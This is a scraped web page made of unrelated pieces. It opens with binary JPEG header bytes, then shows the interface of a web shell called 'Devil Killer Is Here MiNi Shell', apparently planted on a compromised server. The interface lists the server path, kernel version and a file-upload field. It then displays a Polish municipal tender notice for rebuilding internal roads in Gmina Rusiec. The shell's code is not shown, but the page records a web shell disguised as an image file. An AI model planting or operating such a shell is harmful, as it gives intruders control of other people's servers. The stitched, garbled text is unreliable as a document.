JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230810/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230810/0034900401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dróg wewnętrznych na terenie Gminy Rusiec </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA RUSIEC</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730934708</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wieluńska 35</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rusiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-438</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">436766011</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@rusiec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rusiec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dróg wewnętrznych na terenie Gminy Rusiec </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-65b05053-3757-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00349004</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00085651/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Przebudowa dróg wewnętrznych na terenie Gminy Rusiec</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-65b05053-3757-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się drogą elektroniczną przy użyciu platformy e-Zamówienia („Platforma”) https://ezamowienia.gov.pl/ lub<br/>poczty elektronicznej: agnieszka.niziolek@rusiec.pl, z zastrzeżeniem, że złożenie oferty konieczne jest wyłącznie przy użyciu<br/>Platformy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się drogą elektroniczną przy użyciu platformy e-Zamówienia dalej zw. Platforma:https://ezamowienia.gov.pl/<br/>lub poczty elektr.:agnieszka.niziolek@rusiec.pl,z zastrzeżeniem, że złożenie oferty konieczne jest wyłącznie przy użyciu<br/>Platformy.Korzystanie z Platformy jest bezpłatne.Zamawiający wyznacza następujące osoby do kontaktu z wykonawcami:Agnieszka<br/>Niziołek,tel43/6766011wew.239e-mail:agnieszka.niziolek@rusiec.pl,Marek Łopata,tel.43/6766011wew. 227email:<br/>marek.lopata@rusiec.plAdres strony internetowej prowadzonego postępowania(link prowadzący bezpośrednio do widoku<br/>postępowania na Platformie)oraz Identyfikator(ID)postępowania na platformie znajdują się wZałączniku nr6 do niniejszej<br/>SWZ.Postępowanie można wyszukać również ze strony głównej Platformy(wybierając przycisk „przeglądaj<br/>postępowanie/konkursy”).Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto podmiotu„Wykonawca”na Platformie.Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i<br/>warunki korzystania z Platformy określa Regulamin Platformy, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz<br/>informacje zamieszczone w zakładce”Centrum pomocy”.Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie<br/>wymaga posiadania konta na Platformie ani logowania.Sposób sporządzenia dokumentów elektronicznych lub dokumentów<br/>elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej(cyfrowe odwzorowania)musi być zgodny z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów<br/>elektronicznych.Dokumenty elektroniczne,o których mowa w §2ust.1rozporz. Prezesa Rady Ministrów w sprawie wymagań dla<br/>dokumentów elektronicznych,sporządza się w postaci elektronicznej,w formatach danych określonych w przepisach rozporz. Rady<br/>Ministrów w sprawie Krajowym Ram Interoperacyjności,z uwzględnieniem rodzaju przekazywanych danych i przekazuje je jako<br/>załączniki.W przypadku formatów,o których mowa w art.66ust.1 ustawy Pzp,ww. regulacje nie będą miały bezpośredniego<br/>zastosowania.Informacje,oświadczenia lub dokumenty,inne niż wymienione w§2ust.1rozporz. Prezesa Rady Ministrów w sprawie<br/>wymagań dla dokumentów elektronicznych,przekazywane w postępowaniu sporządza się w postaci elektronicznej:a)w formatach<br/>danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności(i przekazuje się<br/>jako załącznik),lub b)jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji<br/>elektronicznej(np.w treści wiad. e-mail lub w treści„Formularza do komunikacji”).Jeżeli dokumenty elektroniczne,przekazywane przy<br/>użyciu środków komunikacji elektronicznej,zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów<br/>ustawy z dnia 16kwietnia1993r. o zwalczaniu nieuczciwej konkurencji(Dz.U.z2020r.poz.1913oraz z 2021r.poz.1655) wykonawca,w<br/>celu utrzymania w poufności tych informacji,przekazuje je w wydzielonym i odpowiednio oznaczonym pliku,wraz z jednoczesnym<br/>zaznaczeniem w nazwie pliku„Dokument stanowiący tajemnicę przedsiębiorstwa”.Komunikacja w postępowaniu,z wyłączeniem<br/>składania ofert/wniosków o dopuszczenie do udziału w postępowaniu,może odbywać się drogą elektroniczną za pośrednictwem<br/>formularzy do komunikacji dostępnych w zakładce„Formularze”(„Formularze do komunikacji”).Korespondencja przesłana za pomocą<br/>tego formularza nie może być szyfrowana.We wszelkiej korespondencji związanej z niniejszym postępowaniem zamawiający i<br/>wykonawcy posługują się numerem ogłoszenia ID postępowania.Za pośrednictwem„formularzy do komunikacji”odbywa się w<br/>szczególności przekazywanie wezwań,zawiadomień i wniosków służących do zadawania pytań o wyjaśnienie treści SWZ.Pozostałe<br/>zapisy umieszczone są rozdz.XII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art.13ust.1 i 2 oraz art.14 rozporz. Parlamentu Europejskiego i<br/>Rady(UE)2016/679 z dnia 27kwietnia2016r.w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy95/46/WE(ogólne rozporz.o ochronie danych)(Dz.Urz.UE L<br/>119 z04.05.2016,str.1),dalej„RODO”,informuję,że:1)administratorem Pani/Pana danych osobowych jest Urząd Gminy Rusiec<br/>reprezentowany przez Wójta Gminy Rusiec Damiana Szczytowskiego,2)Administrator wyznaczył Inspektora Ochrony Danych Pan<br/>Rafał Andrzejewski,z którym można skontaktować się pod adresem email:iod.r.andrzejewski@szkoleniaprawnicze.com.pl oraz<br/>telefonicznie pod nr tel.504 976 690,3)Dane osobowe wykonawcy będą przetwarzane na podstawie art.6ust.1 lit.c RODO oraz na<br/>podstawie przepisów ustawy z dnia 11września2019r.Prawo zamówień publicznych(t.j.Dz.U.z2022r.poz.1710z późn. zm.)<br/>„ustawaPzp”;w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie<br/>podstawowym bez negocjacji, zawarciem umowy oraz jej realizacją oraz na podstawie art.6ust.1lit.f RODO.W przypadku<br/>przetwarzania danych osobowych na podstawie art.6ust.1lit.f)RODO za prawnie uzasadniony interes Administratora uznaje<br/>się:a)ustalenie lub dochodzenie przez Administratora roszczeń cywilnoprawnych wynikających z realizacji niniejszej Umowy, a także<br/>obrona przed takimi roszczeniami;b)weryfikacja danych osobowych w publicznych rejestrach4)Odbiorcami Pani/Pana danychosobowych będą osoby lub podmioty upoważnione zgodnie z przepisami prawa powszechnie obowiązującego, którym udostępniona<br/>zostanie dokumentacja postępowania, w tym w szczególności w oparciu o art.18 oraz art.74 ustawy Pzp.Odbiorcami państwa danych<br/>będą: podmioty i organy, którym Administrator jest zobowiązany lub upoważniony udostępnić dane osobowe na podstawie<br/>powszechnie obowiązujących przepisów prawa, oraz podmioty, które na podstawie stosownych umów przetwarzają dane osobowe<br/>powierzone do przetwarzania przez Administratora w związku z realizacją usług gwarantujących należyte wykonanie niniejszej<br/>Umowy;5)Pani/Pana dane osobowe będą przechowywane, zgodnie z art.78ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia,a jeżeli czas trwania umowy przekracza 4 lata,okres przechowywania obejmuje cały czas<br/>trwania umowy. W przypadku zawarcia i realizacji umowy obejmuje również okres niezbędny do zabezpieczenia ewentualnych<br/>roszczeń wynikających z umowy, chyba, że przepisy szczegółowe stanowią inaczej;6)Obowiązek podania przez Panią/Pana danych<br/>osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp w związku z<br/>art.6ust.1 lit.c RODO związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp;7)W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany, stosowanie do art. 22 RODO;8)posiada Pani/Pan:na podstawie art.15RODO prawo dostępu do danych<br/>osobowych Pani/Pana dotyczących;na podstawie art.16RODO prawo do sprostowania Pani/Pana danych osobowych;na podstawie<br/>art.18RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków,o<br/>których mowa w art.18ust.2RODO;prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;prawo do wniesienia sprzeciwu wobec<br/>przetwarzania danych osobowych,który administrator przetwarza na podstawie art.6 ust.1 lit.f RODO w związku z treścią pkt<br/>3)i5);9)nie przysługuje Pani/Panu:w związku z art.17 ust.3 lit.b,d lub e RODO prawo do usunięcia danych osobowych;prawo do<br/>przenoszenia danych osobowych,o którym mowa w art.20 RODO;na podstawie art.21RODO,prawo sprzeciwu, wobec przetwarzania<br/>danych osobowych,gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art.6 ust.1lit.c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">c.d. RODO 10)Wykonawca ubiegając się o udzielenie zamówienia publicznego jest<br/>zobowiązany do wypełnienia wszystkich obowiązków formalno-prawnych związanych z udziałem w postępowaniu. Do obowiązków<br/>tych należą m.in. obowiązki wynikające z RODO, w szczególności obowiązek informacyjny przewidziany w art. 13 RODO względem<br/>osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał. Jednakże obowiązek<br/>informacyjny wynikający z art. 13 RODO nie będzie miał zastosowania, gdy i w zakresie, w jakim osoba fizyczna, której dane<br/>dotyczą, dysponuje już tymi informacjami (vide: art. 13 ust. 4). Ponadto wykonawca będzie musiał wypełnić obowiązek informacyjny<br/>wynikający z art. 14 RODO względem osób fizycznych, których dane przekazuje zamawiającemu i których dane pośrednio pozyskał,<br/>chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO. W celu zapewnienia, że<br/>wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały<br/>przekazane w związku z udziałem wykonawcy w postępowaniu, Zamawiający zobowiązuje wykonawcę do złożenia w postępowaniu<br/>o udzielenie zamówienia publicznego oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13<br/>lub art. 14 RODO.11)Wzór oświadczenia wymaganego od wykonawcy w zakresie wypełnienia przez niego obowiązków<br/>informacyjnych przewidzianych w art. 13 lub art. 14 RODO został uwzględniony we wzorze formularza ofertowego (załącznik nr 1 do<br/>SWZ).12)Do spraw nieuregulowanych w SWZ mają zastosowanie przepisy ustawy z 11 września 2019 r. – Prawo zamówień<br/>publicznych (t.j. Dz.U. z 2022 r. poz. 1710 ze zm.) oraz przepisy RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GB5.271.10.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres robót do wykonania obejmuje:<br/>1) Przebudowę drogi wewnętrznej na odcinku od km 0+000,00 do km 0+450,00, w miejscowości Krasowa w Gminie Rusiec<br/>położonej na działce nr 2349/2, w obrębie 0016, a w szczególności:<br/>- Przebudowę drogi długości 450 mb o szerokości 4,50 m na długości 10 m, w dalszym odcinku szerokości 3,50 m z<br/>poszerzeniami na łukach oraz w km 0+085 mijanką długości 25 m.<br/>- Dwustronne pobocza z mieszanki niezwiązanej o szerokości 0,75 m z lokalnymi przewężeniami.- Zjazdy do pobliskich działek w miejscach zjazdów istniejących,<br/>- Jezdnia o nawierzchni bitumicznej ze spadkiem daszkowym 2% (z wyłączeniem łuku i zmian spadków),<br/>- Odtworzenie i wykonanie nowych trawników (na skarpach) tj. na długości drogi po stronie prawej i lewej o szerokości 0,50<br/>m,<br/>- Dostosowanie oznakowania pionowego i poziomego,<br/>- W celu wykonania poboczy w miejscach zawyżonej niwelety wykonać nasyp wraz ze skarpami, dowiązując się do stanu<br/>istniejącego.<br/>Zakres polegający na wycięciu drzew oraz nasadzeniu drzew leży po stronie Zamawiającego.<br/>2) Zakres robót do wykonania określa wzór umowy stanowiący Załącznik nr 5a do SWZ oraz dokumentacja techniczna,stanowiąca Załącznik nr 7a do SWZ, na którą składają się:<br/>a) Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych zwanej dalej również jako „STWiORB”<br/>b) Projekt Techniczny wraz z rysunkami oraz informacją BIOZ<br/>c) Projekt zagospodarowania terenu<br/>d) Opinia geotechniczna<br/>e) Zgłoszenie budowy<br/>f) Przedmiar robót<br/>UWAGA: Dołączony do SWZ przedmiar robót ma charakter poglądowy i ułatwiający Wykonawcy identyfikację robót<br/>budowlanych. Dla ustalenia prawidłowej ilości i rodzaju robót na potrzeby sporządzenia oferty, Zamawiający sugeruje<br/>przeprowadzenie analizy pozostałych składników dokumentacji projektowej, a także analizy Specyfikacji Technicznej<br/>Wykonania i Odbioru Robót.<br/>Zamawiający wymaga udzielenia min. 60-cio miesięcznej gwarancji na wykonany przedmiot zamówienia. Okres rękojmi jest równy okresowi udzielonej gwarancji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty w następujących kryteriach: Kryterium Cena - maksymalna liczba<br/>pkt. 60 oraz kryterium Okres gwarancji - maksymalna liczba pkt. 40. Zamawiający dokona oceny ofert przydzielając punkty w każdym<br/>z przyjętych kryteriów, które następnie zostaną zsumowane.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres robót obejmuje:<br/>1) Przebudowę drogi wewnętrznej o długości 417 m w miejscowości Dąbrowa Rusiecka na działce nr 521, w obrębie 0005 w granicach istniejącego pasa drogowego wraz ze zjazdami do posesji i zjazdem z drogi powiatowej nr 1924E, a w szczególności:<br/>- Wykonanie jezdni bitumicznej szerokości 3,0 m (z poszerzeniem przy zjeździe z drogi powiatowej do 4,5 m z poboczami<br/>tłuczniowymi szerokości 0,75 m z przepustem);<br/>- Uzupełnienie obustronnych poboczy szerokości 0,3 m (z poszerzeniem pobocza do 1,5 m<br/>w km 0+320-0+340);<br/>- Przebudowę zjazdów do granicy pasa drogowego (wraz z łukami skrętnymi o promieniu 3 m);<br/>- Regulacja z wymianą skrzynki żeliwnej zasuw wodociągowych w pasie jezdni z poboczami.<br/>2) Zakres robót do wykonania określa wzór umowy stanowiący Załącznik nr 5b do SWZ oraz dokumentacja techniczna,<br/>stanowiąca Załącznik nr 7b do SWZ, na którą składają się:<br/>a) Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych zwanej dalej również jako „STWiORB”<br/>b) Projekt Budowlany wraz z rysunkami oraz informacją BIOZ<br/>c) Zgłoszenie budowy<br/>d) Przedmiar robót<br/>UWAGA: Dołączony do SWZ przedmiar robót ma charakter poglądowy i ułatwiający Wykonawcy identyfikację robót<br/>budowlanych. Dla ustalenia prawidłowej ilości i rodzaju robót na potrzeby sporządzenia oferty, Zamawiający sugeruje<br/>przeprowadzenie analizy pozostałych składników dokumentacji projektowej, a także analizy Specyfikacji Technicznej<br/>Wykonania i Odbioru Robót.<br/>3) Zamawiający wymaga udzielenia min. 60-cio miesięcznej gwarancji na wykonany przedmiot zamówienia. Okres rękojmi<br/>jest równy okresowi udzielonej gwarancji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233142-6 - Roboty w zakresie naprawy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p 